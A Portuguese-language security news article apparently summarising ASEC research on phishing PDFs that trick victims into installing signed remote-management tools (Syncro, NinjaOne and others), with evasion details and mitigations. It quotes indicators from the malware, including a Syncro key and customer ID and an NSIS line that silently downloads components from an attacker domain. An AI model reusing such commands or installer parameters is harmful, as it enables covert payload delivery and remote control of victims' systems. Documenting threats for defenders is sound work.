Pesquisadores da ASEC identificaram uma campanha que distribui PDFs maliciosos para induzir vítimas a instalar ferramentas legítimas de RMM (Remote Monitoring and Management) — Syncro, SuperOps, NinjaOne e ConnectWise — usando páginas falsas e instaladores assinados que passam por mecanismos de defesa.
Método de ataque
O vetor começa com um PDF disfarçado como "Invoice" ou "Payment". Ao abrir, o usuário vê uma imagem de alta qualidade que impede preview ou recebe uma mensagem "Failed to load PDF document" — ambos os cenários redirecionam para uma página falsa do Google Drive ou site que imita a Adobe, onde é oferecido um suposto video .mp4 que na verdade é um instalador RMM.
Técnica de evasão e infraestrutura
ASEC identificou que os instaladores maliciosos foram assinados com certificados válidos compartilhados pela campanha, o que ajuda a burlar detecções baseadas em assinatura. Variantes empregam instaladores NSIS ou Advanced Installer que executam downloads silenciosos de payloads adicionais de domínios controlados pelos atacantes.
Detalhes técnicos relevantes
- Para implantações Syncro, a campanha usa parâmetros específicos no instalador, incluindo um key com valor "yK0UAOaHHwdbYDOp_sr51w" e customerid "1709830" — indicadores que permitem ao operador identificar e gerenciar hosts comprometidos dentro da infraestrutura RMM legítima.
- O script NSIS embutido executa comandos como StrCpy $0 $TEMP\temp_response.html e INetC::get/silent https://anhemvn124.com $0 para baixar silenciosamente componentes adicionais.
Impacto operacional
Ferramentas RMM são vistas como de confiança por soluções de segurança e administradores, o que cria um vetor potente: uma vez implantado, o atacante pode usar a própria infraestrutura de RMM para administração remota legítima, movimento lateral e persistência. A campanha tem potencial para afetar MSPs e clientes empresariais de todos os portes.
Mitigações práticas
- Políticas de e-mail/segurança para bloquear anexos de origem não confiável e inspeção de links que apontam para Google Drive;
- Reforço de controles de assinatura de código e verificação de certificados — investigar cadeias de certificação atípicas;
- Bloquear execuções silenciosas e instalação por usuários sem privilégios; restringir uso de RMM a canais e contas gerenciadas;
- Monitoramento pós‑implantação para identificar instalações RMM não autorizadas (parâmetros de linha de comando, novos clientes registrados, conexões a domínios suspeitos).
Conclusão
ASEC documenta uma campanha que explora a confiança em RMMs e em serviços de armazenamento para entregar instaladores maliciosos assinados. Equipes de segurança devem tratar RMM como um risco crítico de ataque inicial e aplicar controles administrativos e detecção focada em parâmetros de instalação e comunicações anômalas.